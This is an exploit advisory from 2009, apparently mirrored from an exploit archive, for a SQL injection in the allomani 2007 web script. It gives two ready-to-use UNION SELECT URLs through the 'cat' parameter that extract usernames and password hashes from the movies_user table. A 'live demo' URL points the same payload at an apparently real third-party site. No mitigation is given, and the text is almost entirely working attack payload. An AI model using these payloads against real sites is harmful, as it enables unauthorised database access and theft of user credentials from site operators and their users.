[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : allomani 2007 (cat) Remote SQL Injection Vulnerability
# Published : 2009-08-26
# Author : NeX HaCkeR
# Previous Title : PAD Site Scripts 3.6 (list.php string) SQL Injection Vulnerability
# Next Title : phpSANE 0.5.0 (save.php) Remote File Inclusion Vulnerability


==================

NaMe: allomani 2007  <= SQL Injection Vulnerability
Author : NeX HackEr
Contact: c2l@hotmail.com

==================

Script site : http://allomani.com

==================

ExplOiT:

 UserName

http://www.xxx.com/path/index.php?action=browse&cat=-1 and 1=0 UNION AlL SELECT username,2,3 from movies_user

 Password


http://www.xxx.com/path/index.php?action=browse&cat=-1 and 1=0 UNION AlL SELECT password,2,3 from movies_user

 :) 

==================

Live DemO:

http://www.leeen.net/index.php?action=browse&cat=43 and 1=0 UNION AlL SELECT username,2,3 from movies_user



+========================================================+
|                                                                                   
| Greetz.: ~ alMaFiA ~ RmZ AlJnooP ~ GaBsH ~                                          
|               And All Friends!!!!                      
+========================================================+

# www.Syue.com [2009-08-26]